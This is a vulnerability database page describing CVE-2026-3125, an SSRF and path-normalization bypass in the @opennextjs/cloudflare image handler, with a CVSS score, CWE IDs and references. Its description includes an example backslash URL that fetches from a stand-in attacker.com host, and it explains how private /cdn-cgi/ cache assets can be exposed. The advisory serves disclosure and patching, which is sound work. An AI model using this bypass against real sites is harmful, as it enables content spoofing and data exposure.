Logo
-

Byte Open Security

(ByteOS Network)

Log In

Sign Up

ByteOS

Security
Vulnerability Details
Registries
Custom Views
Weaknesses
Attack Patterns
Filters & Tools
NVD Vulnerability Details :
CVE-2026-3125
Received
More InfoOfficial Page
Source-cna@cloudflare.com
View Known Exploited Vulnerability (KEV) details
Published At-04 Mar, 2026 | 19:16
Updated At-04 Mar, 2026 | 19:16

A Server-Side Request Forgery (SSRF) vulnerability was identified in the @opennextjs/cloudflare package, resulting from a path normalization bypass in the /cdn-cgi/image/ handler.The @opennextjs/cloudflare worker template includes a /cdn-cgi/image/ handler intended for development use only. In production, Cloudflare's edge intercepts /cdn-cgi/image/ requests before they reach the Worker. However, by substituting a backslash for a forward slash (/cdn-cgi\image/ instead of /cdn-cgi/image/), an attacker can bypass edge interception and have the request reach the Worker directly. The JavaScript URL class then normalizes the backslash to a forward slash, causing the request to match the handler and trigger an unvalidated fetch of arbitrary remote URLs. For example: https://victim-site.com/cdn-cgi\image/aaaa/https://attacker.com In this example, attacker-controlled content from attacker.com is served through the victim site's domain (victim-site.com), violating the same-origin policy and potentially misleading users or other services. Note: This bypass only works via HTTP clients that preserve backslashes in paths (e.g., curl --path-as-is). Browsers normalize backslashes to forward slashes before sending requests. Additionally, Cloudflare Workers with Assets and Cloudflare Pages suffer from a similar vulnerability. Assets stored under /cdn-cgi/ paths are not publicly accessible under normal conditions. However, using the same backslash bypass (/cdn-cgi\... instead of /cdn-cgi/...), these assets become publicly accessible. This could be used to retrieve private data. For example, Open Next projects store incremental cache data under /cdn-cgi/_next_cache, which could be exposed via this bypass.

CISA Catalog
Date AddedDue DateVulnerability NameRequired Action
N/A
Date Added: N/A
Due Date: N/A
Vulnerability Name: N/A
Required Action: N/A
Metrics
TypeVersionBase scoreBase severityVector
Secondary4.07.7HIGH
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Type: Secondary
Version: 4.0
Base score: 7.7
Base severity: HIGH
Vector:
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
CPE Matches

Weaknesses
CWE IDTypeSource
CWE-706Secondarycna@cloudflare.com
CWE-918Secondarycna@cloudflare.com
CWE ID: CWE-706
Type: Secondary
Source: cna@cloudflare.com
CWE ID: CWE-918
Type: Secondary
Source: cna@cloudflare.com
Evaluator Description

Evaluator Impact

Evaluator Solution

Vendor Statements

References
HyperlinkSourceResource
https://github.com/advisories/GHSA-rvpw-p7vw-wj3mcna@cloudflare.com
N/A
https://github.com/opennextjs/opennextjs-cloudflare/pull/1147cna@cloudflare.com
N/A
https://www.cve.org/cverecord?id=CVE-2025-6087cna@cloudflare.com
N/A
https://www.npmjs.com/package/@opennextjs/cloudflare/v/1.17.1cna@cloudflare.com
N/A
Hyperlink: https://github.com/advisories/GHSA-rvpw-p7vw-wj3m
Source: cna@cloudflare.com
Resource: N/A
Hyperlink: https://github.com/opennextjs/opennextjs-cloudflare/pull/1147
Source: cna@cloudflare.com
Resource: N/A
Hyperlink: https://www.cve.org/cverecord?id=CVE-2025-6087
Source: cna@cloudflare.com
Resource: N/A
Hyperlink: https://www.npmjs.com/package/@opennextjs/cloudflare/v/1.17.1
Source: cna@cloudflare.com
Resource: N/A
Change History
0Changes found

Details not found